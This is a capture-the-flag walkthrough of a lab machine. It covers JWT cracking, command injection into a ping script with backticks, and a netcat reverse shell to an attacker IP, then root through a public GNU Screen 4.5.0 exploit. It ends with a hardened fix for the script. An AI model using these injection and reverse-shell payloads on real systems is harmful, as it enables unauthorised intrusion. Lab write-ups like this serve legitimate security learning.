nmap -sCV -O -p- -oA auroraSCAN -vvv 10.10.1.16
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
3000/tcp open http syn-ack ttl 64 Node.js Express framework
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Error
MAC Address: 08:00:27:1A:8B:0C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
3000/tcp HTTP
We know from nmap that this is a Node.js Express framework, but we could have also known by viewing the source of the page.
We can't use the GET method for the root directory, but can we use it for others?
Login needs credentials, so we need to register first
Bad Request for the "role" field
After a couple of registration attempts I searched for how register pages are usually built in Node.js applications, and this Medium writer even included what the request should look like.
Now we know the secret, but it seems JWT.io has changed how it encodes tokens, so I will use another site.
We have an access token as an admin. But what is it for? We only had register and login. I'm using dirsearch for quick hits, but for more control I'll use ffuf. The difference between these kinds of tools is how much control you have over the request, the speed, and the UX.
I used a different wordlist here and didn't get the register page, but I did get a new page, "execute".
This tools.py pings the IP I give it, so let's try command injection.
www-data@aurora:/home/doro$ ls -la
total 36
drwxr-xr-x 4 doro doro 4096 Mar 8 2023 .
drwxr-xr-x 3 root root 4096 Mar 6 2023 ..
lrwxrwxrwx 1 root root 9 Mar 3 2023 .bash_history -> /dev/null
-rw-r--r-- 1 doro doro 220 Mar 3 2023 .bash_logout
-rw-r--r-- 1 doro doro 3526 Mar 3 2023 .bashrc
drwxr-xr-x 3 doro doro 4096 Mar 4 2023 .local
-rw-r--r-- 1 doro doro 807 Mar 3 2023 .profile
drwx------ 2 doro doro 4096 Mar 4 2023 .ssh
-rw-r--r-- 1 root root 1380 Mar 7 2023 tools.py
-rwx------ 1 doro doro 33 Mar 3 2023 user.txt
www-data@aurora:/home/doro$ sudo -u doro /usr/bin/python3 /home/doro/tools.py --ping
Enter an IP address: 10.10.1.16
PING 10.10.1.16 (10.10.1.16) 56(84) bytes of data.
64 bytes from 10.10.1.16: icmp_seq=1 ttl=64 time=0.065 ms
64 bytes from 10.10.1.16: icmp_seq=2 ttl=64 time=0.028 ms
--- 10.10.1.16 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1015ms
rtt min/avg/max/mdev = 0.028/0.046/0.065/0.018 ms
We can't use ';'.
www-data@aurora:/home/doro$ sudo -u doro /usr/bin/python3 /home/doro/tools.py --ping
Enter an IP address: 1;nc 10.10.1.11 9001 -e /bin/bash
Forbidden character found: ;
I tried some of the injections I know, and found that backticks (`) work.
www-data@aurora:/home/doro$ sudo -u doro /usr/bin/python3 /home/doro/tools.py --ping
Enter an IP address: 1\nid
ping: 1nid: Temporary failure in name resolution
www-data@aurora:/home/doro$ sudo -u doro /usr/bin/python3 /home/doro/tools.py --ping
Enter an IP address: 10.10.1.16\nid
ping: 10.10.1.16nid: Temporary failure in name resolution
www-data@aurora:/home/doro$ sudo -u doro /usr/bin/python3 /home/doro/tools.py --ping
Enter an IP address: 10.10.1.16&id
Forbidden character found: &
www-data@aurora:/home/doro$ sudo -u doro /usr/bin/python3 /home/doro/tools.py --ping
Enter an IP address: 10.10.1.16|id
Forbidden character found: |
www-data@aurora:/home/doro$ sudo -u doro /usr/bin/python3 /home/doro/tools.py --ping
Enter an IP address: 10.10.1.16&&id
Forbidden character found: &
www-data@aurora:/home/doro$ sudo -u doro /usr/bin/python3 /home/doro/tools.py --ping
Enter an IP address: 10.10.1.16||id
Forbidden character found: ||
www-data@aurora:/home/doro$ sudo -u doro /usr/bin/python3 /home/doro/tools.py --ping
Enter an IP address: 10.10.1.16$()id
Forbidden character found: (
www-data@aurora:/home/doro$ sudo -u doro /usr/bin/python3 /home/doro/tools.py --ping
Enter an IP address: 10.10.1.16``id
ping: 10.10.1.16id: Temporary failure in name resolution
Shell as doro
Let's get a shell as doro.
nc -nvlp 9001
www-data@aurora:~$ sudo -u doro /usr/bin/python3 /home/doro/tools.py --ping
Enter an IP address: `nc 10.10.1.11 9001 -e /bin/bash`
Upgrade TTY
nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.1.11] from (UNKNOWN) [10.10.1.16] 59682
python3 -c 'import pty; pty.spawn("/bin/bash")'
doro@aurora:/opt/login-app$ ^Z
[1] + 2455 suspended nc -nvlp 9001
➜ aurora stty raw -echo;fg
[1] + 2455 continued nc -nvlp 9001
export SHELL=bash
doro@aurora:/opt/login-app$ export TERM=xterm-256color
doro@aurora:/opt/login-app$ stty rows 53 columns 236
doro@aurora:/opt/login-app$ cd ~
doro@aurora:~$ ls -la
total 36
drwxr-xr-x 4 doro doro 4096 Mar 8 2023 .
drwxr-xr-x 3 root root 4096 Mar 6 2023 ..
lrwxrwxrwx 1 root root 9 Mar 3 2023 .bash_history -> /dev/null
-rw-r--r-- 1 doro doro 220 Mar 3 2023 .bash_logout
-rw-r--r-- 1 doro doro 3526 Mar 3 2023 .bashrc
drwxr-xr-x 3 doro doro 4096 Mar 4 2023 .local
-rw-r--r-- 1 doro doro 807 Mar 3 2023 .profile
drwx------ 2 doro doro 4096 Mar 4 2023 .ssh
-rw-r--r-- 1 root root 1380 Mar 7 2023 tools.py
-rwx------ 1 doro doro 33 Mar 3 2023 user.txt
python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
strace Not Found
-rwsr-xr-- 1 root messagebus 51K Oct 5 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 471K Jul 2 2022 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 55K Jan 20 2022 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 63K Feb 7 2020 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 58K Feb 7 2020 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 71K Jan 20 2022 /usr/bin/su
-rwsr-xr-x 1 root root 52K Feb 7 2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 44K Feb 7 2020 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 87K Feb 7 2020 /usr/bin/gpasswd
-rwsr-sr-x+ 1 root root 1.8M Mar 3 2023 /usr/bin/screen ---> GNU_Screen_4.5.0
-rwsr-xr-x 1 root root 179K Jan 14 2023 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 35K Jan 20 2022 /usr/bin/umount ---> BSD/Linux(08-1996)
╔══════════╣ SGID
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
-rwxr-sr-x 1 root crontab 43K Feb 22 2021 /usr/bin/crontab
-rwxr-sr-x 1 root ssh 347K Jul 2 2022 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 35K Jan 20 2022 /usr/bin/wall
-rwxr-sr-x 1 root tty 23K Jan 20 2022 /usr/bin/write.ul (Unknown SGID binary)
-rwxr-sr-x 1 root shadow 31K Feb 7 2020 /usr/bin/expiry
-rwxr-sr-x 1 root shadow 79K Feb 7 2020 /usr/bin/chage
-rwsr-sr-x+ 1 root root 1.8M Mar 3 2023 /usr/bin/screen ---> GNU_Screen_4.5.0
-rwxr-sr-x 1 root mail 23K Feb 4 2021 /usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 38K Aug 26 2021 /usr/sbin/unix_chkpwd
Here we have mount, passwd, chfn, newgrp, screen, sudo (not certain), umount, and write.ul (Unknown).
What I do here is take each binary and check whether GTFOBins has any exploits for it. I will start with screen, since it appears in both the SUID and SGID lists.
Nothing interesting there. Maybe the version has an exploit?
searchsploit GNU screen 4.5.0
--------------------------------------------------------- ---------------------------
 Exploit Title                                           | Path
--------------------------------------------------------- ---------------------------
GNU Screen 4.5.0 - Local Privilege Escalation            | linux/local/41154.sh
GNU Screen 4.5.0 - Local Privilege Escalation (PoC)      | linux/local/41152.txt
--------------------------------------------------------- ---------------------------
Shellcodes: No Results
doro@aurora:~$ ./41154.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
/tmp/libhax.c: In function ‘dropshell’:
/tmp/libhax.c:7:5: warning: implicit declaration of function ‘chmod’ [-Wimplicit-function-declaration]
7 | chmod("/tmp/rootshell", 04755);
| ^~~~~
/tmp/rootshell.c: In function ‘main’:
/tmp/rootshell.c:3:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
3 | setuid(0);
| ^~~~~~
/tmp/rootshell.c:4:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
4 | setgid(0);
| ^~~~~~
/tmp/rootshell.c:5:5: warning: implicit declaration of function ‘seteuid’ [-Wimplicit-function-declaration]
5 | seteuid(0);
| ^~~~~~~
/tmp/rootshell.c:6:5: warning: implicit declaration of function ‘setegid’ [-Wimplicit-function-declaration]
6 | setegid(0);
| ^~~~~~~
/tmp/rootshell.c:7:5: warning: implicit declaration of function ‘execvp’ [-Wimplicit-function-declaration]
7 | execvp("/bin/sh", NULL, NULL);
| ^~~~~~
/tmp/rootshell.c:7:5: warning: too many arguments to built-in function ‘execvp’ expecting 2 [-Wbuiltin-declaration-mismatch]
/usr/bin/ld: cannot open output file /tmp/rootshell: Permission denied
collect2: error: ld returned 1 exit status
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-doro.
# id
uid=0(root) gid=0(root) groups=0(root),1000(doro)
# cd /root
# ls
root.txt
# cat root.txt
052cf26a6e7e33790391c0d869e2e40c
Beyond root
tools.py has protection for command injection, but it doesn't have a filter for backticks, which is why it worked.
tools.py
import os
import sys


def main():
    if len(sys.argv) < 2:
        print_help()
        return
    option = sys.argv[1]
    if option == "--ping":
        ping()
    elif option == "--traceroute":
        traceroute_ip()
    else:
        print("Invalid option.")
        print_help()


def print_help():
    print("Usage: python3 network_tool.py <option>")
    print("Options:")
    print("--ping        Ping an IP address")
    print("--traceroute  Perform a traceroute on an IP address")


def ping():
    ip_address = input("Enter an IP address: ")
    # Blocklist of shell metacharacters; note that backticks are not in it.
    forbidden_chars = ["&", ";", "(", ")", "||", "|", ">", "<", "*", "?"]
    for char in forbidden_chars:
        if char in ip_address:
            print("Forbidden character found: {}".format(char))
            sys.exit(1)
    # The input is concatenated into a shell command string.
    os.system('ping -c 2 ' + ip_address)


def traceroute_ip():
    ip_address = input("Enter an IP address: ")
    # Unlike ping(), this path validates the address format before use.
    if not is_valid_ip(ip_address):
        print("Invalid IP address.")
        return
    traceroute_command = "traceroute {}".format(ip_address)
    os.system(traceroute_command)


def is_valid_ip(ip_address):
    octets = ip_address.split(".")
    if len(octets) != 4:
        return False
    for octet in octets:
        if not octet.isdigit() or int(octet) < 0 or int(octet) > 255:
            return False
    return True


if __name__ == "__main__":
    main()
After a couple of steps I knew how to register, and in the end I got a JWT token, which I had experience with before on HTB.
We need to crack it. I will use hashcat, since it can run on Windows and use my GPU, which takes less time than the VM.
If you want to know the module number, view . You can pass the first couple of characters or search for JWT, and it will pop up immediately.
From here we can continue with some manual enumeration or use any of the automated privilege escalation tools. I will use .
Now, set up a web server to transfer it to the machine.
One of the things I love to start with, if there is no RED/YELLOW hit, is SUID and SGID binaries, because you can run those as root.
Backticks are used for command substitution, which means the shell executes the command inside the backticks and replaces it with its output.
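As an added example (not code from the original writeup), the following reproduces the blocklist from tools.py's ping() to show that a backtick payload passes it untouched, next to a hardened ping that validates the input with an allowlist (the same idea as the page's own is_valid_ip for traceroute) and runs ping as an argument vector with no shell involved. The function names are my own.

```python
import ipaddress
import shlex
import subprocess

# The blocklist used by tools.py ping(), reproduced to show its gap.
FORBIDDEN_CHARS = ["&", ";", "(", ")", "||", "|", ">", "<", "*", "?"]


def blocklist_allows(user_input):
    """True if tools.py's blocklist would let this input reach os.system()."""
    return not any(c in user_input for c in FORBIDDEN_CHARS)


def validate_ipv4(user_input):
    """Allowlist check: accept only a syntactically valid IPv4 address.

    Returns the canonical dotted-quad string, raises ValueError otherwise.
    Backticks, spaces, hostnames and every shell metacharacter fail here
    without having to be enumerated one by one.
    """
    return str(ipaddress.IPv4Address(user_input.strip()))


def is_valid_ipv4(user_input):
    """Boolean wrapper around validate_ipv4 for callers that prefer no exception."""
    try:
        validate_ipv4(user_input)
        return True
    except ValueError:
        return False


def ping_argv(user_input):
    """Build the ping command as an argv list, never as a shell string.

    With no shell, command substitution (backticks or $(...)) cannot occur:
    the validated address is passed to ping as one literal argument.
    """
    return ["ping", "-c", "2", validate_ipv4(user_input)]


def safe_ping(user_input):
    """Hardened replacement for tools.py ping(): validate, then exec without a shell."""
    argv = ping_argv(user_input)
    print("running:", shlex.join(argv))
    return subprocess.run(argv, check=False).returncode  # shell=False by default


if __name__ == "__main__":
    # Constructed samples: the writeup's working payload, a blocked one, a benign address.
    for sample in ["10.10.1.16", "`id`", "10.10.1.16`id`", "1;id"]:
        print(f"{sample!r:18} blocklist={'passes' if blocklist_allows(sample) else 'blocks':6} "
              f"allowlist={'accepts' if is_valid_ipv4(sample) else 'rejects'}")
```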